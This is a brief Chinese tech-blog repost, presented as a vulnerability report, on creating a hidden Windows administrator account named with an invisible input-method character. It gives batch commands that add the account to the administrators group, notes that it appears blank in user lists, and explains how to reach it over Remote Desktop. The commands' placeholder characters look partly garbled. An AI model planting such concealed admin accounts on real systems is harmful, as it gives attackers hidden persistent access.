分类: 网络与安全
2010-10-29 14:11:05
详细说明:
可以通过智能ABC输入法中V9里的空白字符建立隐藏帐号,命令行下无法建立,可以先写个批处理,如下:
net user ?123 /add
net localgroup administrators ?/add
注意其中的空白字符.非空格.
建立后命令行下用net user命令查看账户显示为空白,在用户界面中同样显示空白.
建立此帐号后无法在mstsc中直接输入登陆,需要在远程桌面的选项面板的常规选项卡中的用户名一栏里用智能ABC的V9输入特殊字符后再次连接.
漏洞证明:
新建一个批处理,内容如下.
net user ?123 /add
net localgroup administrators ?/add
执行后查看用户管理界面,看看是否有个空白帐号.本博文转载于:博洋的技术博客
